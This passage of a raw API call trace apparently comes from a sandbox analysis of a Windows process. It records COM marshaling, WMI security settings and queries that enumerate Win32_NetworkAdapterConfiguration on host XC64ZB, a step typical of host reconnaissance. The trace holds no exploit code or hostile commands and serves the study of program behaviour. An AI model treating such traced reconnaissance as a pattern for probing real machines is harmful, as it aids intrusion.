puBuffLength=0x19f430*=0x22, pszText="Win32_NetworkAdapterConfiguration") returned 0x0 [0178.078] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x594350, puCount=0x19f434 | out: puCount=0x19f434*=0x0) returned 0x0 [0178.078] WbemDefPath:IWbemPath:GetText (in: This=0x594350, lFlags=2, puBuffLength=0x19f430*=0x0, pszText=0x0 | out: puBuffLength=0x19f430*=0x22, pszText=0x0) returned 0x0 [0178.078] WbemDefPath:IWbemPath:GetText (in: This=0x594350, lFlags=2, puBuffLength=0x19f430*=0x22, pszText="000000000000000000000000000000000" | out: puBuffLength=0x19f430*=0x22, pszText="Win32_NetworkAdapterConfiguration") returned 0x0 [0178.078] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x594350, puCount=0x19f3c4 | out: puCount=0x19f3c4*=0x0) returned 0x0 [0178.078] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x594510, puCount=0x19f3b0 | out: puCount=0x19f3b0*=0x2) returned 0x0 [0178.079] WbemDefPath:IWbemPath:GetText (in: This=0x594510, lFlags=4, puBuffLength=0x19f3ac*=0x0, pszText=0x0 | out: puBuffLength=0x19f3ac*=0xf, pszText=0x0) returned 0x0 [0178.079] WbemDefPath:IWbemPath:GetText (in: This=0x594510, lFlags=4, puBuffLength=0x19f3ac*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f3ac*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0178.079] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x43c [0178.079] SetEvent (hEvent=0x3b4) returned 1 [0178.079] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x19f30c*=0x43c, lpdwindex=0x19f12c | out: lpdwindex=0x19f12c) returned 0x0 [0178.081] CoGetContextToken (in: pToken=0x19f1d8 | out: pToken=0x19f1d8) returned 0x0 [0178.082] CoGetContextToken (in: pToken=0x19f138 | out: pToken=0x19f138) returned 0x0 [0178.082] WbemDefPath:IUnknown:QueryInterface (in: This=0x594200, riid=0x19f208*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f204 | out: ppvObject=0x19f204*=0x594200) returned 0x0 [0178.082] WbemDefPath:IUnknown:AddRef (This=0x594200) returned 0x3 [0178.082] WbemDefPath:IUnknown:Release (This=0x594200) returned 0x2 [0178.082] WbemDefPath:IWbemPath:SetText (This=0x594200, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0178.082] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x594200, puCount=0x19f388 | out: puCount=0x19f388*=0x2) returned 0x0 [0178.082] WbemDefPath:IWbemPath:GetText (in: This=0x594200, lFlags=4, puBuffLength=0x19f384*=0x0, pszText=0x0 | out: puBuffLength=0x19f384*=0xf, pszText=0x0) returned 0x0 [0178.082] WbemDefPath:IWbemPath:GetText (in: This=0x594200, lFlags=4, puBuffLength=0x19f384*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f384*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0178.096] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x19f2a8*=0x450, lpdwindex=0x19f15c | out: lpdwindex=0x19f15c) returned 0x0 [0178.136] CoGetContextToken (in: pToken=0x19f0a0 | out: pToken=0x19f0a0) returned 0x0 [0178.136] CoGetContextToken (in: pToken=0x19f048 | out: pToken=0x19f048) returned 0x0 [0178.136] IUnknown:QueryInterface (in: This=0x524148, riid=0x6948da0c*(Data1=0x1da, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f024 | out: ppvObject=0x19f024*=0x524158) returned 0x0 [0178.137] CObjectContext::ContextCallback () returned 0x0 [0178.140] IUnknown:Release (This=0x524158) returned 0x1 [0178.140] CoUnmarshalInterface (in: pStm=0x580980, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f094 | out: ppv=0x19f094*=0x546ec8) returned 0x0 [0178.140] CoMarshalInterface (pStm=0x580980, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnk=0x546ec8, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0) returned 0x0 [0178.141] WbemLocator:IUnknown:QueryInterface (in: This=0x546ec8, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ef34 | out: ppvObject=0x19ef34*=0x546ec8) returned 0x0 [0178.141] WbemLocator:IUnknown:QueryInterface (in: This=0x546ec8, riid=0x69519c98*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19eef0 | out: ppvObject=0x19eef0*=0x0) returned 0x80004002 [0178.142] WbemLocator:IUnknown:QueryInterface (in: This=0x546ec8, riid=0x69519bb4*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ed0c | out: ppvObject=0x19ed0c*=0x0) returned 0x80004002 [0178.142] WbemLocator:IUnknown:QueryInterface (in: This=0x546ec8, riid=0x69519c88*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19eae4 | out: ppvObject=0x19eae4*=0x0) returned 0x80004002 [0178.143] WbemLocator:IUnknown:AddRef (This=0x546ec8) returned 0x3 [0178.143] WbemLocator:IUnknown:QueryInterface (in: This=0x546ec8, riid=0x695198cc*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e844 | out: ppvObject=0x19e844*=0x0) returned 0x80004002 [0178.143] WbemLocator:IUnknown:QueryInterface (in: This=0x546ec8, riid=0x69519820*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e7f4 | out: ppvObject=0x19e7f4*=0x0) returned 0x80004002 [0178.143] WbemLocator:IUnknown:QueryInterface (in: This=0x546ec8, riid=0x693ba540*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e800 | out: ppvObject=0x19e800*=0x546e24) returned 0x0 [0178.143] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x546e24, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e808 | out: pCid=0x19e808*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0178.143] WbemLocator:IUnknown:Release (This=0x546e24) returned 0x3 [0178.143] CoGetContextToken (in: pToken=0x19e860 | out: pToken=0x19e860) returned 0x0 [0178.143] CoGetContextToken (in: pToken=0x19ec68 | out: pToken=0x19ec68) returned 0x0 [0178.143] WbemLocator:IUnknown:QueryInterface (in: This=0x546ec8, riid=0x69519b0c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ecf4 | out: ppvObject=0x19ecf4*=0x546eac) returned 0x0 [0178.143] WbemLocator:IRpcOptions:Query (in: This=0x546eac, pPrx=0x546ec8, dwProperty=2, pdwValue=0x19ed00 | out: pdwValue=0x19ed00) returned 0x0 [0178.143] WbemLocator:IUnknown:Release (This=0x546eac) returned 0x3 [0178.143] WbemLocator:IUnknown:Release (This=0x546ec8) returned 0x2 [0178.143] WbemLocator:IUnknown:Release (This=0x546ec8) returned 0x1 [0178.143] CoGetContextToken (in: pToken=0x19efe0 | out: pToken=0x19efe0) returned 0x0 [0178.144] WbemLocator:IUnknown:AddRef (This=0x546ec8) returned 0x2 [0178.144] WbemLocator:IUnknown:QueryInterface (in: This=0x546ec8, riid=0x65a61234*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f298 | out: ppvObject=0x19f298*=0x546ea4) returned 0x0 [0178.144] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x546ea4, pProxy=0x546ec8, pAuthnSvc=0x19f2e8, pAuthzSvc=0x19f2e4, pServerPrincName=0x19f2dc, pAuthnLevel=0x19f2e0, pImpLevel=0x19f2d0, pAuthInfo=0x19f2d4, pCapabilites=0x19f2d8 | out: pAuthnSvc=0x19f2e8*=0xa, pAuthzSvc=0x19f2e4*=0x0, pServerPrincName=0x19f2dc, pAuthnLevel=0x19f2e0*=0x6, pImpLevel=0x19f2d0*=0x2, pAuthInfo=0x19f2d4, pCapabilites=0x19f2d8*=0x1) returned 0x0 [0178.144] WbemLocator:IUnknown:Release (This=0x546ea4) returned 0x2 [0178.144] WbemLocator:IUnknown:QueryInterface (in: This=0x546ec8, riid=0x65a61224*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f28c | out: ppvObject=0x19f28c*=0x546ec8) returned 0x0 [0178.144] WbemLocator:IUnknown:QueryInterface (in: This=0x546ec8, riid=0x65a61234*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f278 | out: ppvObject=0x19f278*=0x546ea4) returned 0x0 [0178.144] WbemLocator:IClientSecurity:SetBlanket (This=0x546ea4, pProxy=0x546ec8, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0178.144] WbemLocator:IUnknown:Release (This=0x546ea4) returned 0x3 [0178.145] WbemLocator:IUnknown:Release (This=0x546ec8) returned 0x2 [0178.145] CoTaskMemFree (pv=0x598c78) [0178.145] WbemLocator:IUnknown:Release (This=0x546ec8) returned 0x1 [0178.145] SysStringLen (param_1=0x0) returned 0x0 [0178.145] CoGetContextToken (in: pToken=0x19f258 | out: pToken=0x19f258) returned 0x0 [0178.145] CoGetContextToken (in: pToken=0x19f1b8 | out: pToken=0x19f1b8) returned 0x0 [0178.145] WbemLocator:IUnknown:QueryInterface (in: This=0x546ec8, riid=0x19f288*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x19f284 | out: ppvObject=0x19f284*=0x57d640) returned 0x0 [0178.146] WbemLocator:IUnknown:AddRef (This=0x57d640) returned 0x3 [0178.146] WbemLocator:IUnknown:Release (This=0x57d640) returned 0x2 [0178.146] CoGetContextToken (in: pToken=0x19f218 | out: pToken=0x19f218) returned 0x0 [0178.146] WbemLocator:IUnknown:AddRef (This=0x57d640) returned 0x3 [0178.146] WbemLocator:IUnknown:QueryInterface (in: This=0x57d640, riid=0x65a61234*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f298 | out: ppvObject=0x19f298*=0x546ea4) returned 0x0 [0178.146] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x546ea4, pProxy=0x57d640, pAuthnSvc=0x19f2e8, pAuthzSvc=0x19f2e4, pServerPrincName=0x19f2dc, pAuthnLevel=0x19f2e0, pImpLevel=0x19f2d0, pAuthInfo=0x19f2d4, pCapabilites=0x19f2d8 | out: pAuthnSvc=0x19f2e8*=0xa, pAuthzSvc=0x19f2e4*=0x0, pServerPrincName=0x19f2dc, pAuthnLevel=0x19f2e0*=0x6, pImpLevel=0x19f2d0*=0x2, pAuthInfo=0x19f2d4, pCapabilites=0x19f2d8*=0x1) returned 0x0 [0178.146] WbemLocator:IUnknown:Release (This=0x546ea4) returned 0x3 [0178.146] WbemLocator:IUnknown:QueryInterface (in: This=0x57d640, riid=0x65a61224*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f28c | out: ppvObject=0x19f28c*=0x546ec8) returned 0x0 [0178.146] WbemLocator:IUnknown:QueryInterface (in: This=0x57d640, riid=0x65a61234*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f278 | out: ppvObject=0x19f278*=0x546ea4) returned 0x0 [0178.146] WbemLocator:IClientSecurity:SetBlanket (This=0x546ea4, pProxy=0x57d640, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0178.147] WbemLocator:IUnknown:Release (This=0x546ea4) returned 0x4 [0178.147] WbemLocator:IUnknown:Release (This=0x546ec8) returned 0x3 [0178.147] CoTaskMemFree (pv=0x5989d8) [0178.147] WbemLocator:IUnknown:Release (This=0x57d640) returned 0x2 [0178.147] SysStringLen (param_1=0x0) returned 0x0 [0178.147] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x594200, puCount=0x19f3ac | out: puCount=0x19f3ac*=0x2) returned 0x0 [0178.147] WbemDefPath:IWbemPath:GetText (in: This=0x594200, lFlags=4, puBuffLength=0x19f3a8*=0x0, pszText=0x0 | out: puBuffLength=0x19f3a8*=0xf, pszText=0x0) returned 0x0 [0178.147] WbemDefPath:IWbemPath:GetText (in: This=0x594200, lFlags=4, puBuffLength=0x19f3a8*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f3a8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0178.147] CoGetContextToken (in: pToken=0x19f018 | out: pToken=0x19f018) returned 0x0 [0178.147] CoUnmarshalInterface (in: pStm=0x580980, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f00c | out: ppv=0x19f00c*=0x546ec8) returned 0x0 [0178.148] CoMarshalInterface (pStm=0x580980, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnk=0x546ec8, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0) returned 0x0 [0178.148] WbemLocator:IUnknown:QueryInterface (in: This=0x546ec8, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19eeac | out: ppvObject=0x19eeac*=0x546ec8) returned 0x0 [0178.148] WbemLocator:IUnknown:Release (This=0x546ec8) returned 0x3 [0178.148] WbemLocator:IUnknown:Release (This=0x546ec8) returned 0x2 [0178.148] CoGetContextToken (in: pToken=0x19ef58 | out: pToken=0x19ef58) returned 0x0 [0178.148] WbemLocator:IUnknown:AddRef (This=0x546ec8) returned 0x3 [0178.149] WbemLocator:IUnknown:QueryInterface (in: This=0x546ec8, riid=0x65a61234*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f210 | out: ppvObject=0x19f210*=0x546ea4) returned 0x0 [0178.149] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x546ea4, pProxy=0x546ec8, pAuthnSvc=0x19f260, pAuthzSvc=0x19f25c, pServerPrincName=0x19f254, pAuthnLevel=0x19f258, pImpLevel=0x19f248, pAuthInfo=0x19f24c, pCapabilites=0x19f250 | out: pAuthnSvc=0x19f260*=0xa, pAuthzSvc=0x19f25c*=0x0, pServerPrincName=0x19f254, pAuthnLevel=0x19f258*=0x6, pImpLevel=0x19f248*=0x3, pAuthInfo=0x19f24c, pCapabilites=0x19f250*=0x20) returned 0x0 [0178.149] WbemLocator:IUnknown:Release (This=0x546ea4) returned 0x3 [0178.149] WbemLocator:IUnknown:QueryInterface (in: This=0x546ec8, riid=0x65a61224*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f204 | out: ppvObject=0x19f204*=0x546ec8) returned 0x0 [0178.149] WbemLocator:IUnknown:QueryInterface (in: This=0x546ec8, riid=0x65a61234*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f1f0 | out: ppvObject=0x19f1f0*=0x546ea4) returned 0x0 [0178.149] WbemLocator:IClientSecurity:SetBlanket (This=0x546ea4, pProxy=0x546ec8, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0178.149] WbemLocator:IUnknown:Release (This=0x546ea4) returned 0x4 [0178.149] WbemLocator:IUnknown:Release (This=0x546ec8) returned 0x3 [0178.150] WbemLocator:IUnknown:Release (This=0x546ec8) returned 0x2 [0178.150] SysStringLen (param_1=0x0) returned 0x0 [0178.150] CoGetContextToken (in: pToken=0x19f1d0 | out: pToken=0x19f1d0) returned 0x0 [0178.150] WbemLocator:IUnknown:AddRef (This=0x57d640) returned 0x3 [0178.150] WbemLocator:IUnknown:Release (This=0x57d640) returned 0x2 [0178.150] CoGetContextToken (in: pToken=0x19f190 | out: pToken=0x19f190) returned 0x0 [0178.150] WbemLocator:IUnknown:AddRef (This=0x57d640) returned 0x3 [0178.150] WbemLocator:IUnknown:QueryInterface (in: This=0x57d640, riid=0x65a61234*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f210 | out: ppvObject=0x19f210*=0x546ea4) returned 0x0 [0178.150] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x546ea4, pProxy=0x57d640, pAuthnSvc=0x19f260, pAuthzSvc=0x19f25c, pServerPrincName=0x19f254, pAuthnLevel=0x19f258, pImpLevel=0x19f248, pAuthInfo=0x19f24c, pCapabilites=0x19f250 | out: pAuthnSvc=0x19f260*=0xa, pAuthzSvc=0x19f25c*=0x0, pServerPrincName=0x19f254, pAuthnLevel=0x19f258*=0x6, pImpLevel=0x19f248*=0x3, pAuthInfo=0x19f24c, pCapabilites=0x19f250*=0x20) returned 0x0 [0178.151] WbemLocator:IUnknown:Release (This=0x546ea4) returned 0x3 [0178.151] WbemLocator:IUnknown:QueryInterface (in: This=0x57d640, riid=0x65a61224*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f204 | out: ppvObject=0x19f204*=0x546ec8) returned 0x0 [0178.151] WbemLocator:IUnknown:QueryInterface (in: This=0x57d640, riid=0x65a61234*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f1f0 | out: ppvObject=0x19f1f0*=0x546ea4) returned 0x0 [0178.151] WbemLocator:IClientSecurity:SetBlanket (This=0x546ea4, pProxy=0x57d640, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0178.151] WbemLocator:IUnknown:Release (This=0x546ea4) returned 0x4 [0178.151] WbemLocator:IUnknown:Release (This=0x546ec8) returned 0x3 [0178.151] WbemLocator:IUnknown:Release (This=0x57d640) returned 0x2 [0178.151] SysStringLen (param_1=0x0) returned 0x0 [0178.151] WbemDefPath:IWbemPath:GetText (in: This=0x594350, lFlags=2, puBuffLength=0x19f3b0*=0x0, pszText=0x0 | out: puBuffLength=0x19f3b0*=0x22, pszText=0x0) returned 0x0 [0178.151] WbemDefPath:IWbemPath:GetText (in: This=0x594350, lFlags=2, puBuffLength=0x19f3b0*=0x22, pszText="000000000000000000000000000000000" | out: puBuffLength=0x19f3b0*=0x22, pszText="Win32_NetworkAdapterConfiguration") returned 0x0 [0178.152] IWbemServices:GetObject (in: This=0x57d640, strObjectPath="Win32_NetworkAdapterConfiguration", lFlags=0, pCtx=0x0, ppObject=0x19f364*=0x0, ppCallResult=0x0 | out: ppObject=0x19f364*=0x517c98, ppCallResult=0x0) returned 0x0 [0178.199] IWbemClassObject:Get (in: This=0x517c98, wszName="__PATH", lFlags=0, pVal=0x19f34c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f3f4*=0, plFlavor=0x19f3f0*=0 | out: pVal=0x19f34c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\ROOT\\cimv2:Win32_NetworkAdapterConfiguration", varVal2=0x0), pType=0x19f3f4*=8, plFlavor=0x19f3f0*=64) returned 0x0 [0178.199] SysStringByteLen (bstr="\\\\XC64ZB\\ROOT\\cimv2:Win32_NetworkAdapterConfiguration") returned 0x6a [0178.199] SysStringByteLen (bstr="\\\\XC64ZB\\ROOT\\cimv2:Win32_NetworkAdapterConfiguration") returned 0x6a [0178.199] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x454 [0178.199] SetEvent (hEvent=0x3b4) returned 1 [0178.200] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x19f308*=0x454, lpdwindex=0x19f124 | out: lpdwindex=0x19f124) returned 0x0 [0178.207] CoGetContextToken (in: pToken=0x19f1d8 | out: pToken=0x19f1d8) returned 0x0 [0178.207] CoGetContextToken (in: pToken=0x19f138 | out: pToken=0x19f138) returned 0x0 [0178.207] WbemDefPath:IUnknown:QueryInterface (in: This=0x5944a0, riid=0x19f208*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f204 | out: ppvObject=0x19f204*=0x5944a0) returned 0x0 [0178.207] WbemDefPath:IUnknown:AddRef (This=0x5944a0) returned 0x3 [0178.207] WbemDefPath:IUnknown:Release (This=0x5944a0) returned 0x2 [0178.207] WbemDefPath:IWbemPath:SetText (This=0x5944a0, uMode=0x4, pszPath="\\\\XC64ZB\\ROOT\\cimv2:Win32_NetworkAdapterConfiguration") returned 0x0 [0178.207] IWbemClassObject:Get (in: This=0x517c98, wszName="__CLASS", lFlags=0, pVal=0x19f3bc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f43c*=0, plFlavor=0x19f438*=0 | out: pVal=0x19f3bc*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_NetworkAdapterConfiguration", varVal2=0x0), pType=0x19f43c*=8, plFlavor=0x19f438*=64) returned 0x0 [0178.207] SysStringByteLen (bstr="Win32_NetworkAdapterConfiguration") returned 0x42 [0178.207] SysStringByteLen (bstr="Win32_NetworkAdapterConfiguration") returned 0x42 [0178.207] CoGetContextToken (in: pToken=0x19f1b0 | out: pToken=0x19f1b0) returned 0x0 [0178.207] WbemLocator:IUnknown:AddRef (This=0x57d640) returned 0x3 [0178.207] IWbemServices:CreateInstanceEnum (in: This=0x57d640, strFilter="Win32_NetworkAdapterConfiguration", lFlags=17, pCtx=0x0, ppEnum=0x19f3b8 | out: ppEnum=0x19f3b8*=0x599f88) returned 0x0 [0178.296] IUnknown:QueryInterface (in: This=0x599f88, riid=0x65a61234*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f220 | out: ppvObject=0x19f220*=0x599f8c) returned 0x0 [0178.296] IClientSecurity:QueryBlanket (in: This=0x599f8c, pProxy=0x599f88, pAuthnSvc=0x19f270, pAuthzSvc=0x19f26c, pServerPrincName=0x19f264, pAuthnLevel=0x19f268, pImpLevel=0x19f258, pAuthInfo=0x19f25c, pCapabilites=0x19f260 | out: pAuthnSvc=0x19f270*=0xa, pAuthzSvc=0x19f26c*=0x0, pServerPrincName=0x19f264, pAuthnLevel=0x19f268*=0x6, pImpLevel=0x19f258*=0x2, pAuthInfo=0x19f25c, pCapabilites=0x19f260*=0x1) returned 0x0 [0178.296] IUnknown:Release (This=0x599f8c) returned 0x1 [0178.296] IUnknown:QueryInterface (in: This=0x599f88, riid=0x65a61224*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f214 | out: ppvObject=0x19f214*=0x5b0630) returned 0x0 [0178.296] IUnknown:QueryInterface (in: This=0x599f88, riid=0x65a61234*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f200 | out: ppvObject=0x19f200*=0x599f8c) returned 0x0 [0178.296] IClientSecurity:SetBlanket (This=0x599f8c, pProxy=0x599f88, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0178.367] IUnknown:Release (This=0x599f8c) returned 0x2 [0178.367] WbemLocator:IUnknown:Release (This=0x5b0630) returned 0x1 [0178.367] CoTaskMemFree (pv=0x598858) [0178.367] IUnknown:QueryInterface (in: This=0x599f88, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ee08 | out: ppvObject=0x19ee08*=0x5b0630) returned 0x0 [0178.368] WbemLocator:IUnknown:QueryInterface (in: This=0x5b0630, riid=0x69519c98*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19edc4 | out: ppvObject=0x19edc4*=0x0) returned 0x80004002 [0178.376] WbemLocator:IUnknown:QueryInterface (in: This=0x5b0630, riid=0x69519bb4*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ebe4 | out: ppvObject=0x19ebe4*=0x0) returned 0x80004002 [0178.399] IUnknown:QueryInterface (in: This=0x599f88, riid=0x69519c88*(Data1=0xaf86e2e0, Data2=0xb12d, 